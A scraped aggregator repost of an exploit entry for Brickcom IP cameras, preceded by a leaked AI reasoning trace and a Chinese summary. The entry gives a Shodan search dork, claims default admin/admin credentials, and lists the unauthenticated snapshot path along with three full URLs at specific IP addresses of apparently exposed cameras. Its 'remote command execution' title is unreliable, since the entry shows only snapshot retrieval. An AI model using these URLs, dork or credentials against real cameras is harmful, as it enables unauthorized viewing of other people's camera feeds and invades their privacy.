Brickcom Camera - Remote command execution
好的,我现在需要帮用户总结一篇文章的内容,控制在100个字以内,并且不需要特定的开头。首先,我得仔细阅读用户提供的文章内容。 文章标题是关于Brickcom摄像头的远程命令执行漏洞。日期是2/26/2026,作者是parsa rezaie khiabanloo。测试环境包括Windows、Linux和Android。描述部分提到所有版本的Brickcom摄像头默认用户名和密码都是admin,并且存在无需认证的远程命令执行漏洞。 漏洞利用的路径有两个:/ONVIF/media.cgi?action=getSnapshot&channel=1和ONVIF/media.cgi?action=getSnapshot。证明概念部分给出了几个具体的URL示例,展示了如何通过这些路径获取摄像头快照而无需认证。 用户的需求是用中文总结,不超过100字。所以我要抓住关键点:漏洞名称、影响范围、默认凭据、RCE的存在以及利用路径和例子。 接下来,我需要将这些信息浓缩成一句话或两句话,确保涵盖所有重要信息,同时保持简洁。避免使用复杂的术语,让总结易于理解。 最后,检查字数是否在限制内,并确保没有遗漏关键细节。 </think> Brickcom摄像头存在远程命令执行漏洞,默认用户名密码为admin,无需认证即可通过特定路径获取快照。 2026-2-26 18:38:27 Author: cxsecurity.com(查看原文) 阅读量:0 收藏

# Exploit Title: Exploit Title: Brickcom Camera - Remote command execution # Date: 2/26/2026 # Google Dork : In Shodan search engine, the filter is --> realm="Brickcom" # Exploit Author: parsa rezaie khiabanloo # Tested on: Windows/Linux/Android # 1. Description: All Brickcom versions username and password are admin and they have RCE snapshot without authentication. Exploit : /ONVIF/media.cgi?action=getSnapshot&amp;channel=1 Exploit : ONVIF/media.cgi?action=getSnapshot # 2 . Proof of Concept: Retrieve a camera snapshot without authentication: http://2.81.165.52:5000/ONVIF/media.cgi?action=getSnapshot&amp;channel=1 http://109.89.253.56:10001/ONVIF/media.cgi?action=getSnapshot http://80.123.193.122:10101/ONVIF/media.cgi?action=getSnapshot



 

Thanks for you comment!
Your message is in quarantine 48 hours.


文章来源: https://cxsecurity.com/issue/WLB-2026020031
如有侵权请联系:admin#unsafe.sh